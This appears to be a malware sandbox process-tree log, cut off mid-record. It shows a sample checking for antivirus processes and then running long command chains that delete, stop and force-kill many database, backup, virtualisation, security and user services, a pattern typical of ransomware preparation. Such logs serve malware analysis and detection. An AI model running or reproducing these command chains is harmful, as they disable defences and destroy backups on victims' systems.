PID:4392 -
C:\Windows\SysWOW64\find.exefind /c "PID"3⤵PID:3604
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "imagename eq avp.exe"3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4488 -
C:\Windows\SysWOW64\find.exefind /c "PID"3⤵PID:876
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "imagename eq WRSA.exe"3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3768 -
C:\Windows\SysWOW64\find.exefind /c "PID"3⤵PID:3840
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "imagename eq egui.exe"3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4556 -
C:\Windows\SysWOW64\find.exefind /c "PID"3⤵PID:3076
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "imagename eq AvastUI.exe"3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2280 -
C:\Windows\SysWOW64\find.exefind /c "PID"3⤵PID:1672
-
C:\Windows\SysWOW64\cmd.execmd /c "color b & @sc delete "XT800Service_Personal" & @sc delete SQLSERVERAGENT & @sc delete SQLWriter & @sc delete SQLBrowser & @sc delete MSSQLFDLauncher & @sc delete MSSQLSERVER & @sc delete QcSoftService & @sc delete MSSQLServerOLAPService & @sc delete VMTools & @sc delete VGAuthService & @sc delete MSDTC & @sc delete TeamViewer & @sc delete ReportServer & @sc delete RabbitMQ & @sc delete "AHS SERVICE" & @sc delete "Sense Shield Service" & @sc delete SSMonitorService & @sc delete SSSyncService & @sc delete TPlusStdAppService1300 & @sc delete MSSQL$SQL2008 & @sc delete SQLAgent$SQL2008 & @sc delete TPlusStdTaskService1300 & @sc delete TPlusStdUpgradeService1300 & @sc delete VirboxWebServer & @sc delete jhi_service & @sc delete LMS & @sc delete "FontCache3.0.0.0" & @sc delete "OSP Service""3⤵PID:5048
-
C:\Windows\SysWOW64\sc.exesc delete "XT800Service_Personal"4⤵PID:1964
-
C:\Windows\SysWOW64\sc.exesc delete SQLSERVERAGENT4⤵PID:4316
-
C:\Windows\SysWOW64\sc.exesc delete SQLWriter4⤵PID:1652
-
C:\Windows\SysWOW64\sc.exesc delete SQLBrowser4⤵
- Launches sc.exe
PID:4976 -
C:\Windows\SysWOW64\sc.exesc delete MSSQLFDLauncher4⤵PID:2036
-
C:\Windows\SysWOW64\sc.exesc delete MSSQLSERVER4⤵PID:1248
-
C:\Windows\SysWOW64\sc.exesc delete QcSoftService4⤵PID:1100
-
C:\Windows\SysWOW64\sc.exesc delete MSSQLServerOLAPService4⤵PID:4200
-
C:\Windows\SysWOW64\sc.exesc delete VMTools4⤵PID:4644
-
C:\Windows\SysWOW64\sc.exesc delete VGAuthService4⤵PID:824
-
C:\Windows\SysWOW64\sc.exesc delete MSDTC4⤵PID:4488
-
C:\Windows\SysWOW64\sc.exesc delete TeamViewer4⤵PID:1312
-
C:\Windows\SysWOW64\sc.exesc delete ReportServer4⤵PID:3988
-
C:\Windows\SysWOW64\sc.exesc delete RabbitMQ4⤵PID:4428
-
C:\Windows\SysWOW64\sc.exesc delete "AHS SERVICE"4⤵PID:3848
-
C:\Windows\SysWOW64\sc.exesc delete "Sense Shield Service"4⤵PID:4672
-
C:\Windows\SysWOW64\sc.exesc delete SSMonitorService4⤵PID:1732
-
C:\Windows\SysWOW64\sc.exesc delete SSSyncService4⤵PID:4008
-
C:\Windows\SysWOW64\sc.exesc delete TPlusStdAppService13004⤵PID:1148
-
C:\Windows\SysWOW64\sc.exesc delete MSSQL$SQL20084⤵
- Launches sc.exe
PID:3756 -
C:\Windows\SysWOW64\sc.exesc delete SQLAgent$SQL20084⤵PID:4340
-
C:\Windows\SysWOW64\sc.exesc delete TPlusStdTaskService13004⤵PID:3604
-
C:\Windows\SysWOW64\sc.exesc delete TPlusStdUpgradeService13004⤵
- Launches sc.exe
PID:4300 -
C:\Windows\SysWOW64\sc.exesc delete VirboxWebServer4⤵PID:4216
-
C:\Windows\SysWOW64\sc.exesc delete jhi_service4⤵PID:2676
-
C:\Windows\SysWOW64\sc.exesc delete LMS4⤵PID:4780
-
C:\Windows\SysWOW64\sc.exesc delete "FontCache3.0.0.0"4⤵
- Launches sc.exe
PID:3280 -
C:\Windows\SysWOW64\sc.exesc delete "OSP Service"4⤵
- Launches sc.exe
PID:3140 -
C:\Windows\SysWOW64\cmd.execmd /c "color b & @sc delete "DAService_TCP" & @sc delete "eCard-TTransServer" & @sc delete eCardMPService & @sc delete EnergyDataService & @sc delete UI0Detect & @sc delete K3MobileService & @sc delete TCPIDDAService & @sc delete WebAttendServer & @sc delete UIODetect & @sc delete "wanxiao-monitor" & @sc delete VMAuthdService & @sc delete VMUSBArbService & @sc delete VMwareHostd & @sc delete "vm-agent" & @sc delete VmAgentDaemon & @sc delete OpenSSHd & @sc delete eSightService & @sc delete apachezt & @sc delete Jenkins & @sc delete secbizsrv & @sc delete SQLTELEMETRY & @sc delete MSMQ & @sc delete smtpsvrJT & @sc delete zyb_sync & @sc delete 360EntHttpServer & @sc delete 360EntSvc & @sc delete 360EntClientSvc & @sc delete NFWebServer & @sc delete wampapache & @sc delete MSSEARCH & @sc delete msftesql & @sc delete "SyncBASE Service" & @sc delete OracleDBConcoleorcl & @sc delete OracleJobSchedulerORCL & @sc delete OracleMTSRecoveryService"3⤵PID:5088
-
C:\Windows\SysWOW64\sc.exesc delete "DAService_TCP"4⤵PID:1800
-
C:\Windows\SysWOW64\sc.exesc delete "eCard-TTransServer"4⤵PID:3504
-
C:\Windows\SysWOW64\sc.exesc delete eCardMPService4⤵PID:1408
-
C:\Windows\SysWOW64\sc.exesc delete EnergyDataService4⤵PID:4872
-
C:\Windows\SysWOW64\sc.exesc delete UI0Detect4⤵PID:1460
-
C:\Windows\SysWOW64\sc.exesc delete K3MobileService4⤵PID:2348
-
C:\Windows\SysWOW64\sc.exesc delete TCPIDDAService4⤵PID:2300
-
C:\Windows\SysWOW64\sc.exesc delete WebAttendServer4⤵PID:628
-
C:\Windows\SysWOW64\sc.exesc delete UIODetect4⤵PID:4848
-
C:\Windows\SysWOW64\sc.exesc delete "wanxiao-monitor"4⤵PID:2744
-
C:\Windows\SysWOW64\sc.exesc delete VMAuthdService4⤵
- Launches sc.exe
PID:3840 -
C:\Windows\SysWOW64\sc.exesc delete VMUSBArbService4⤵PID:4264
-
C:\Windows\SysWOW64\sc.exesc delete VMwareHostd4⤵PID:512
-
C:\Windows\SysWOW64\sc.exesc delete "vm-agent"4⤵PID:3336
-
C:\Windows\SysWOW64\sc.exesc delete VmAgentDaemon4⤵PID:3528
-
C:\Windows\SysWOW64\sc.exesc delete OpenSSHd4⤵PID:3644
-
C:\Windows\SysWOW64\sc.exesc delete eSightService4⤵
- Launches sc.exe
PID:4036 -
C:\Windows\SysWOW64\sc.exesc delete apachezt4⤵PID:1296
-
C:\Windows\SysWOW64\sc.exesc delete Jenkins4⤵
- Suspicious use of AdjustPrivilegeToken
PID:920 -
C:\Windows\SysWOW64\sc.exesc delete secbizsrv4⤵PID:1248
-
C:\Windows\SysWOW64\sc.exesc delete SQLTELEMETRY4⤵PID:4608
-
C:\Windows\SysWOW64\sc.exesc delete MSMQ4⤵
- Launches sc.exe
PID:1732 -
C:\Windows\SysWOW64\sc.exesc delete smtpsvrJT4⤵PID:3140
-
C:\Windows\SysWOW64\sc.exesc delete zyb_sync4⤵PID:3580
-
C:\Windows\SysWOW64\sc.exesc delete 360EntHttpServer4⤵
- Launches sc.exe
PID:3468 -
C:\Windows\SysWOW64\sc.exesc delete 360EntSvc4⤵PID:4340
-
C:\Windows\SysWOW64\sc.exesc delete 360EntClientSvc4⤵PID:1460
-
C:\Windows\SysWOW64\sc.exesc delete NFWebServer4⤵PID:676
-
C:\Windows\SysWOW64\sc.exesc delete wampapache4⤵PID:2344
-
C:\Windows\SysWOW64\sc.exesc delete MSSEARCH4⤵PID:628
-
C:\Windows\SysWOW64\sc.exesc delete msftesql4⤵
- Launches sc.exe
PID:1940 -
C:\Windows\SysWOW64\sc.exesc delete "SyncBASE Service"4⤵PID:4672
-
C:\Windows\SysWOW64\sc.exesc delete OracleDBConcoleorcl4⤵
- Launches sc.exe
PID:3660 -
C:\Windows\SysWOW64\sc.exesc delete OracleJobSchedulerORCL4⤵PID:4564
-
C:\Windows\SysWOW64\sc.exesc delete OracleMTSRecoveryService4⤵PID:3424
-
C:\Windows\SysWOW64\cmd.execmd /c "color b & @sc delete OracleOraDb11g_home1ClrAgent & @sc delete OracleOraDb11g_home1TNSListener & @sc delete OracleVssWriterORCL & @sc delete OracleServiceORCL & @sc delete aspnet_state @sc delete Redis & @sc delete OracleVssWriterORCL & @sc delete JhTask & @sc delete ImeDictUpdateService & @sc delete XT800Service_Personal & @sc delete MCService & @sc delete ImeDictUpdateService & @sc delete allpass_redisservice_port21160 & @sc delete "Flash Helper Service" & @sc delete "Kiwi Syslog Server" & @sc delete "UWS HiPriv Services""3⤵PID:1728
-
C:\Windows\SysWOW64\sc.exesc delete OracleOraDb11g_home1ClrAgent4⤵PID:3692
-
C:\Windows\SysWOW64\sc.exesc delete OracleOraDb11g_home1TNSListener4⤵PID:208
-
C:\Windows\SysWOW64\sc.exesc delete OracleVssWriterORCL4⤵PID:756
-
C:\Windows\SysWOW64\sc.exesc delete OracleServiceORCL4⤵PID:952
-
C:\Windows\SysWOW64\sc.exesc delete aspnet_state @sc delete Redis4⤵
- Launches sc.exe
PID:1456 -
C:\Windows\SysWOW64\sc.exesc delete OracleVssWriterORCL4⤵PID:4556
-
C:\Windows\SysWOW64\sc.exesc delete JhTask4⤵PID:4744
-
C:\Windows\SysWOW64\sc.exesc delete ImeDictUpdateService4⤵PID:1940
-
C:\Windows\SysWOW64\sc.exesc delete XT800Service_Personal4⤵
- Launches sc.exe
PID:508 -
C:\Windows\SysWOW64\sc.exesc delete MCService4⤵PID:2784
-
C:\Windows\SysWOW64\sc.exesc delete ImeDictUpdateService4⤵PID:4704
-
C:\Windows\SysWOW64\sc.exesc delete allpass_redisservice_port211604⤵PID:4548
-
C:\Windows\SysWOW64\sc.exesc delete "Flash Helper Service"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4144 -
C:\Windows\SysWOW64\sc.exesc delete "Kiwi Syslog Server"4⤵PID:3580
-
C:\Windows\SysWOW64\sc.exesc delete "UWS HiPriv Services"4⤵
- Launches sc.exe
PID:3048 -
C:\Windows\SysWOW64\cmd.execmd /c "color a & @net stop HaoZipSvc & @net stop "igfxCUIService2.0.0.0" & @net stop Realtek11nSU & @net stop xenlite & @net stop XenSvc & @net stop Apache2.2 & @net stop "Synology Drive VSS Service x64" & @net stop DellDRLogSvc & @net stop FirebirdGuardianDeafaultInstance & @net stop JWEM3DBAUTORun & @net stop JWRinfoClientService & @net stop JWService & @net stop Service2 & @net stop RapidRecoveryAgent & @net stop FirebirdServerDefaultInstance & @net stop AdobeARMservice & @net stop VeeamCatalogSvc & @net stop VeeanBackupSvc & @net stop VeeamTransportSvc & @net stop TPlusStdAppService1300 & @net stop TPlusStdTaskService1300 & @net stop TPlusStdUpgradeService1300 & @net stop TPlusStdWebService1300 & @net stop VeeamNFSSvc & @net stop VeeamDeploySvc & @net stop VeeamCloudSvc & @net stop VeeamMountSvc & @net stop VeeamBrokerSvc & @net stop VeeamDistributionSvc & @net stop tmlisten & @net stop ServiceMid & @net stop 360EntPGSvc & @net stop ClickToRunSvc & @net stop RavTask & @net stop AngelOfDeath & @net stop d_safe & @net stop NFLicenceServer & @net stop "NetVault Process Manager" & @net stop RavService & @net stop DFServ & @net stop IngressMgr & @net stop EvtSys & @net stop K3ClouManager & @net stop NFVPrintServer & @net stop RTCAVMCU & @net stop CobianBackup10 & @net stop GNWebService & @net stop Mysoft.SchedulingService & @net stop AgentX & @net stop SentinelKeysServer & @net stop DGPNPSEV & @net stop TurboCRM70 & @net stop NFSysService & @net stop U8DispatchService & @net stop NFOTPService & @net stop U8EISService & @net stop U8EncryptService & @net stop U8GCService & @net stop U8KeyManagePool & @net stop U8MPool & @net stop U8SCMPool & @net stop U8SLReportService & @net stop U8TaskService & @net stop U8WebPool & @net stop UFAllNet & @net stop UFReportService & @net stop UTUService"3⤵PID:3600
-
C:\Windows\SysWOW64\net.exenet stop HaoZipSvc4⤵PID:3580
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop HaoZipSvc5⤵PID:4732
-
C:\Windows\SysWOW64\net.exenet stop "igfxCUIService2.0.0.0"4⤵PID:2328
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "igfxCUIService2.0.0.0"5⤵PID:4292
-
C:\Windows\SysWOW64\net.exenet stop Realtek11nSU4⤵PID:4136
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Realtek11nSU5⤵PID:1652
-
C:\Windows\SysWOW64\net.exenet stop xenlite4⤵PID:2168
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop xenlite5⤵PID:3528
-
C:\Windows\SysWOW64\net.exenet stop XenSvc4⤵PID:4928
-
C:\Windows\SysWOW64\net.exenet stop Apache2.24⤵PID:4688
-
C:\Windows\SysWOW64\net.exenet stop "Synology Drive VSS Service x64"4⤵PID:4352
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Synology Drive VSS Service x64"5⤵PID:3692
-
C:\Windows\SysWOW64\net.exenet stop DellDRLogSvc4⤵PID:4028
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DellDRLogSvc5⤵PID:3388
-
C:\Windows\SysWOW64\net.exenet stop FirebirdGuardianDeafaultInstance4⤵PID:1960
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop FirebirdGuardianDeafaultInstance5⤵PID:4488
-
C:\Windows\SysWOW64\net.exenet stop JWEM3DBAUTORun4⤵PID:4084
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop JWEM3DBAUTORun5⤵PID:756
-
C:\Windows\SysWOW64\net.exenet stop JWRinfoClientService4⤵PID:5076
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop JWRinfoClientService5⤵PID:3668
-
C:\Windows\SysWOW64\net.exenet stop JWService4⤵PID:4924
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop JWService5⤵PID:3768
-
C:\Windows\SysWOW64\net.exenet stop Service24⤵PID:1148
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Service25⤵PID:4748
-
C:\Windows\SysWOW64\net.exenet stop RapidRecoveryAgent4⤵PID:3280
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop RapidRecoveryAgent5⤵PID:3820
-
C:\Windows\SysWOW64\net.exenet stop FirebirdServerDefaultInstance4⤵PID:1540
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop FirebirdServerDefaultInstance5⤵PID:1208
-
C:\Windows\SysWOW64\net.exenet stop AdobeARMservice4⤵
- Suspicious use of AdjustPrivilegeToken
PID:732 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AdobeARMservice5⤵PID:1444
-
C:\Windows\SysWOW64\net.exenet stop VeeamCatalogSvc4⤵PID:5116
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamCatalogSvc5⤵PID:1868
-
C:\Windows\SysWOW64\net.exenet stop VeeanBackupSvc4⤵PID:2888
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeanBackupSvc5⤵PID:1796
-
C:\Windows\SysWOW64\net.exenet stop VeeamTransportSvc4⤵PID:1048
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc5⤵PID:4768
-
C:\Windows\SysWOW64\net.exenet stop TPlusStdAppService13004⤵PID:4564
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TPlusStdAppService13005⤵PID:1548
-
C:\Windows\SysWOW64\net.exenet stop TPlusStdTaskService13004⤵PID:1752
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TPlusStdTaskService13005⤵PID:4952
-
C:\Windows\SysWOW64\net.exenet stop TPlusStdUpgradeService13004⤵PID:4008
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TPlusStdUpgradeService13005⤵PID:1936
-
C:\Windows\SysWOW64\cmd.execmd /c "color e & @taskkill /IM pg_ctl.exe /F & @taskkill /IM rcrelay.exe /F & @taskkill /IM SogouImeBroker.exe /F & @taskkill /IM CCenter.exe /F & @taskkill /IM ScanFrm.exe /F & @taskkill /IM d_manage.exe /F & @taskkill /IM RsTray.exe /F & @taskkill /IM wampmanager.exe /F & @taskkill /IM RavTray.exe /F & @taskkill /IM mssearch.exe /F & @taskkill /IM sqlmangr.exe /F & @taskkill /IM msftesql.exe /F & @taskkill /IM SyncBaseSvr.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM SyncBaseConsole.exe /F & @taskkill /IM aspnet_state.exe /F & @taskkill /IM AutoBackUpEx.exe /F & @taskkill /IM redis-server.exe /F & @taskkill /IM MySQLNotifier.exe /F & @taskkill /IM oravssw.exe /F & @taskkill /IM fppdis5.exe /F & @taskkill /IM His6Service.exe /F & @taskkill /IM dinotify.exe /F & @taskkill /IM JhTask.exe /F & @taskkill /IM Executer.exe /F & @taskkill /IM AllPassCBHost.exe /F & @taskkill /IM ap_nginx.exe /F & @taskkill /IM AndroidServer.exe /F & @taskkill /IM XT.exe /F & @taskkill /IM XTService.exe /F & @taskkill /IM AllPassMCService.exe /F & @taskkill /IM IMEDICTUPDATE.exe /F & @taskkill /IM FlashHelperService.exe /F & @taskkill /IM ap_redis-server.exe /F & @taskkill /IM UtilDev.WebServer.Monitor.exe /F & @taskkill /IM UWS.AppHost.Clr2.x86.exe /F & @taskkill /IM FoxitProtect.exe /F & @taskkill /IM ftnlses.exe /F & @taskkill /IM ftusbrdwks.exe /F & @taskkill /IM ftusbrdsrv.exe /F & @taskkill /IM ftnlsv.exe /F & @taskkill /IM Syslogd_Service.exe /F & @taskkill /IM UWS.HighPrivilegeUtilities.exe /F & @taskkill /IM ftusbsrv.exe /F & @taskkill /IM UWS.LowPrivilegeUtilities.exe /F & @taskkill /IM UWS.AppHost.Clr2.AnyCpu.exe /F & @taskkill /IM winguard_x64.exe /F & @taskkill /IM vmconnect.exe /F & @taskkill /IM UWS.AppHost.Clr2.x86.exe /F & @taskkill /IM firefox.exe /F & @taskkill /IM usbrdsrv.exe /F & @taskkill /IM usbserver.exe /F & @taskkill /IM Foxmail.exe /F & @taskkill /IM qemu-ga.exe /F & @taskkill /IM wwbizsrv.exe /F & @taskkill /IM ZTEFileTranS.exe /F & @taskkill /IM ZTEUsbIpc.exe /F & @taskkill /IM ZTEUsbIpcGuard.exe /F & @taskkill /IM AlibabaProtect.exe /F & @taskkill /IM kbasesrv.exe /F & @taskkill /IM ZTEVdservice.exe /F & @taskkill /IM MMRHookService.exe /F & @taskkill /IM extjob.exe /F & @taskkill /IM IpOverUsbSvc.exe /F & @taskkill /IM VMwareTray.exe /F & @taskkill /IM devenv.exe /F & @taskkill /IM PerfWatson2.exe /F & @taskkill /IM ServiceHub.Host.Node.x86.exe /F & @taskkill /IM ServiceHub.IdentityHost.exe /F & @taskkill /IM ServiceHub.VSDetouredHost.exe /F & @taskkill /IM ServiceHub.SettingsHost.exe /F & @taskkill /IM ServiceHub.Host.CLR.x86.exe /F & @taskkill /IM ServiceHub.RoslynCodeAnalysisService32.exe /F & @taskkill /IM ServiceHub.DataWarehouseHost.exe /F & @taskkill /IM Microsoft.VisualStudio.Web.Host.exe /F & @taskkill /IM SQLEXPRWT.exe /F & @taskkill /IM setup.exe /F & @taskkill /IM remote.exe /F & @taskkill /IM setup100.exe /F & @taskkill /IM landingpage.exe /F & @taskkill /IM WINWORD.exe /F & @taskkill /IM KuaiYun.exe /F & @taskkill /IM HwsHostPanel.exe /F & @taskkill /IM NovelSpider.exe /F & @taskkill /IM Service_KMS.exe /F & @taskkill /IM WebServer.exe /F & @taskkill /IM ChsIME.exe /F & @taskkill /IM btPanel.exe /F & @taskkill /IM Protect_2345Explorer.exe /F & @taskkill /IM Pic_2345Svc.exe /F & @taskkill /IM vmware-converter-a.exe /F & @taskkill /IM vmware-converter.exe /F & @taskkill /IM vmware.exe /F & @taskkill /IM vmware-unity-helper.exe /F & @taskkill /IM vmware-vmx.exe /F & @taskkill /IM vmware-vmx.exe /F & @taskkill /IM usysdiag.exe /F & @taskkill /IM PopBlock.exe /F & @taskkill /IM gsinterface.exe /F & @taskkill /IM Gemstar.Group.CRS.Client.exe /F & @taskkill /IM TenpayServer.exe /F & @taskkill /IM RemoteExecService.exe /F & @taskkill /IM VS_TrueCorsManager.exe /F & @taskkill /IM ntpsvr-2019-01-22-wgs84.exe /F & @taskkill /IM rtkjob-ion.exe /F & @taskkill /IM ntpsvr-2019-01-22-no-usrcheck.exe /F & @taskkill /IM NtripCaster-2019-01-08.exe /F & @taskkill /IM BACSTray.exe /F & @taskkill /IM protect.exe /F & @taskkill /IM hfs.exe /F & @taskkill /IM jzmis.exe /F & @taskkill /IM NewFileTime_x64.exe /F & @taskkill /IM 2345MiniPage.exe /F & @taskkill /IM JMJ_server.exe /F & @taskkill /IM cacls.exe /F & @taskkill /IM gpsdaemon.exe /F & @taskkill /IM gpsusersvr.exe /F & @taskkill /IM gpsdownsvr.exe /F & @taskkill /IM gpsstoragesvr.exe /F & @taskkill /IM gpsdataprocsvr.exe /F & @taskkill /IM gpsftpd.exe /F & @taskkill /IM gpsmysqld.exe /F & @taskkill /IM gpstomcat6.exe /F & @taskkill /IM gpsloginsvr.exe /F & @taskkill /IM gpsmediasvr.exe /F & @taskkill /IM gpsgatewaysvr.exe /F & @taskkill /IM gpssvrctrl.exe /F & @taskkill /IM zabbix_agentd.exe /F"3⤵PID:4592
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM pg_ctl.exe /F4⤵PID:1428
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM rcrelay.exe /F4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3940 -
C:\Windows\SysWOW64\taskkill.exetaskkill /IM SogouImeBroker.exe /F4⤵PID:996
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM CCenter.exe /F4⤵PID:4732
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM ScanFrm.exe /F4⤵PID:436
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM d_manage.exe /F4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1428 -
C:\Windows\SysWOW64\taskkill.exetaskkill /IM RsTray.exe /F4⤵PID:5116
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM wampmanager.exe /F4⤵PID:1208
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM RavTray.exe /F4⤵PID:2384
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM mssearch.exe /F4⤵PID:3840
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM sqlmangr.exe /F4⤵PID:1208
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM msftesql.exe /F4⤵
- Kills process with taskkill
PID:4848 -
C:\Windows\SysWOW64\taskkill.exetaskkill /IM SyncBaseSvr.exe /F4⤵PID:1512
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM oracle.exe /F4⤵
- Kills process with taskkill
PID:4136 -
C:\Windows\SysWOW64\taskkill.exetaskkill /IM TNSLSNR.exe /F4⤵PID:4320
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM SyncBaseConsole.exe /F4⤵PID:4988
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM aspnet_state.exe /F4⤵PID:2784
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM AutoBackUpEx.exe /F4⤵PID:4568
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM redis-server.exe /F4⤵
- Kills process with taskkill
PID:2476 -
C:\Windows\SysWOW64\taskkill.exetaskkill /IM MySQLNotifier.exe /F4⤵PID:4084
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM oravssw.exe /F4⤵PID:2300
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM fppdis5.exe /F4⤵PID:1672
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM His6Service.exe /F4⤵PID:1484
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM dinotify.exe /F4⤵PID:628
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM JhTask.exe /F4⤵
- Kills process with taskkill
PID:1460 -
C:\Windows\SysWOW64\cmd.execmd /c "color e & @taskkill /IM ThunderPlatform.exe /F & @taskkill /IM iexplore.exe /F & @taskkill /IM vm-agent.exe /F & @taskkill /IM vm-agent-daemon.exe /F & @taskkill /IM eSightService.exe /F & @taskkill /IM cygrunsrv.exe /F & @taskkill /IM wrapper.exe /F & @taskkill /IM nginx.exe /F & @taskkill /IM node.exe /F & @taskkill /IM sshd.exe /F & @taskkill /IM vm-tray.exe /F & @taskkill /IM iempwatchdog.exe /F & @taskkill /IM sqlwriter.exe /F & @taskkill /IM php.exe /F & @taskkill /IM "notepad++.exe" /F & @taskkill /IM "phpStudy.exe" /F & @taskkill /IM OPCClient.exe /F & @taskkill /IM navicat.exe /F & @taskkill /IM SupportAssistAgent.exe /F & @taskkill /IM SunloginClient.exe /F & @taskkill /IM SOUNDMAN.exe /F & @taskkill /IM WeChat.exe /F & @taskkill /IM TXPlatform.exe /F & @taskkill /IM Tencentdll.exe /F & @taskkill /IM httpd.exe /F & @taskkill /IM jenkins.exe /F & @taskkill /IM QQ.exe /F & @taskkill /IM HaoZip.exe /F & @taskkill /IM HaoZipScan.exe /F & @taskkill /IM navicat.exe /F & @taskkill /IM TSVNCache.exe /F & @taskkill /IM RAVCpl64.exe /F & @taskkill /IM secbizsrv.exe /F & @taskkill /IM aliwssv.exe /F & @taskkill /IM Helper_Haozip.exe /F & @taskkill /IM acrotray.exe /F & @taskkill /IM "FileZilla Server Interface.exe" /F & @taskkill /IM YoudaoNote.exe /F & @taskkill /IM YNoteCefRender.exe /F & @taskkill /IM idea.exe /F & @taskkill /IM fsnotifier.exe /F & @taskkill /IM picpick.exe /F & @taskkill /IM lantern.exe /F & @taskkill /IM sysproxy-cmd.exe /F & @taskkill /IM service.exe /F & @taskkill /IM pcas.exe /F & @taskkill /IM PresentationFontCache.exe /F & @taskkill /IM RtWlan.exe /F & @taskkill /IM monitor.exe /F & @taskkill /IM Correspond.exe /F & @taskkill /IM ChatServer.exe /F & @taskkill /IM InetMgr.exe /F & @taskkill /IM LogonServer.exe /F & @taskkill /IM GameServer.exe /F & @taskkill /IM ServUAdmin.exe /F & @taskkill /IM ServUDaemon.exe /F & @taskkill /IM update0.exe /F & @taskkill /IM server.exe /F & @taskkill /IM w3wp.exe /F & @taskkill /IM notepad.exe /F & @taskkill /IM PalmInputService.exe /F & @taskkill /IM PalmInputGuard.exe /F & @taskkill /IM UpdateServer.exe /F & @taskkill /IM UpdateGate.exe /F & @taskkill /IM DBServer.exe /F & @taskkill /IM LoginGate.exe /F & @taskkill /IM SelGate.exe /F & @taskkill /IM RunGate.exe /F & @taskkill /IM M2Server.exe /F & @taskkill /IM LogDataServer.exe /F & @taskkill /IM LoginSrv.exe /F & @taskkill /IM sqlceip.exe /F & @taskkill /IM mqsvc.exe /F & @taskkill /IM RefundOrder.exe /F & @taskkill /IM ClamTray.exe /F & @taskkill /IM AdobeARM.exe /F & @taskkill /IM veeam.backup.shell.exe /F & @taskkill /IM VpxClient.exe /F & @taskkill /IM vmware-vmrc.exe /F & @taskkill /IM DSCPatchService.exe /F & @taskkill /IM scktsrvr.exe /F & @taskkill /IM ServerManager.exe /F & @taskkill /IM Dispatcher.exe /F & @taskkill /IM EFDispatcher.exe /F & @taskkill /IM sqlceip.exe /F & @taskkill /IM mqsvc.exe /F & @taskkill /IM RefundOrder.exe /F & @taskkill /IM ClamTray.exe /F & @taskkill /IM AdobeARM.exe /F & @taskkill /IM veeam.backup.shell.exe /F & @taskkill /IM VpxClient.exe /F & @taskkill /IM vmware-vmrc.exe /F & @taskkill /IM DSCPatchService.exe /F & @taskkill /IM scktsrvr.exe /F & @taskkill /IM ServerManager.exe /F & @taskkill /IM Dispatcher.exe /F & @taskkill /IM EFDispatcher.exe /F & @taskkill /IM ClamWin.exe /F & @taskkill /IM srvany.exe /F & @taskkill /IM JT_AG-8332.exe /F & @taskkill /IM XXTClient.exe /F & @taskkill /IM clean.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM "Net.Service.exe" /F & @taskkill /IM plsqldev.exe /F & @taskkill /IM splwow64.exe /F & @taskkill /IM Oobe.exe /F & @taskkill /IM QQYService.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM SGTool.exe /F & @taskkill /IM postgres.exe /F & @taskkill /IM AppVShNotify.exe /F & @taskkill /IM OfficeClickToRun.exe /F & @taskkill /IM EntDT.exe /F & @taskkill /IM EntPublish.exe /F"3⤵PID:3492
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM ThunderPlatform.exe /F4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3556 -
C:\Windows\SysWOW64\taskkill.exetaskkill /IM iexplore.exe /F4⤵PID:732
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM vm-agent.exe /F4⤵PID:3820
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM vm-agent-daemon.exe /F4⤵
- Kills process with taskkill
PID:1848 -
